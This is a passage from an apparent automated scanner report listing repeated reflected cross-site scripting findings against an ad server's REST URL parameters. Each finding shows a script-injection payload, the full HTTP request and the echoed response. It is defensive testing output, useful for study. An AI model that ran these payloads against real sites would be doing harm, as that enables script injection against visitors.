COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"", c5:"", c6:"4118b<script>alert(1)</script>4ac7260861d", c10:"", c15:"", c16:"", r:""});



3.8. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2aed"><script>alert(1)</script>ea1579b376b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3a2aed"><script>alert(1)</script>ea1579b376b/Dominos/11Q2/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3a2aed"><script>alert(1)</script>ea1579b376b/Dominos/11Q2/CPC/728/13938222/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.9. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae76"><script>alert(1)</script>e6d8e4920b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos8ae76"><script>alert(1)</script>e6d8e4920b2/11Q2/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos8ae76"><script>alert(1)</script>e6d8e4920b2/11Q2/CPC/728/1645687049/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.10. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa50c"><script>alert(1)</script>f435d50f889 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2fa50c"><script>alert(1)</script>f435d50f889/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2fa50c"><script>alert(1)</script>f435d50f889/CPC/728/692216790/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.11. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63980"><script>alert(1)</script>f41eb06de7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC63980"><script>alert(1)</script>f41eb06de7c/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC63980"><script>alert(1)</script>f41eb06de7c/728/45010016/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.12. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c367"><script>alert(1)</script>9f4a0217226 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/7285c367"><script>alert(1)</script>9f4a0217226/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/7285c367"><script>alert(1)</script>9f4a0217226/1835408583/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.13. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db4ff"><script>alert(1)</script>9cb16008c26 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90db4ff"><script>alert(1)</script>9cb16008c26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/356869465/x90db4ff"><script>alert(1)</script>9cb16008c26/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.14. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3091d"><script>alert(1)</script>6f772d0085e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B33091d"><script>alert(1)</script>6f772d0085e/Dominos/11Q2/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B33091d"><script>alert(1)</script>6f772d0085e/Dominos/11Q2/CPC/728/1033713770/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.15. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d062c"><script>alert(1)</script>ca4abf2e429 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominosd062c"><script>alert(1)</script>ca4abf2e429/11Q2/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominosd062c"><script>alert(1)</script>ca4abf2e429/11Q2/CPC/728/832598647/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.16. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90454"><script>alert(1)</script>2d82bb5a239 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q290454"><script>alert(1)</script>2d82bb5a239/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q290454"><script>alert(1)</script>2d82bb5a239/CPC/728/853761001/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.17. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284b4"><script>alert(1)</script>d510252fe66 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/1348337210/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.18. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4d2"><script>alert(1)</script>1a64d0928f4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/901638741/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.19. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764de"><script>alert(1)</script>9f3a5ed7d4b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90764de"><script>alert(1)</script>9f3a5ed7d4b HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/1687274362/x90764de"><script>alert(1)</script>9f3a5ed7d4b/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.20. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c5f0"><script>alert(1)</script>f92225dbdf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/421997782/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.21. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff03f"><script>alert(1)</script>e08fcce560c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
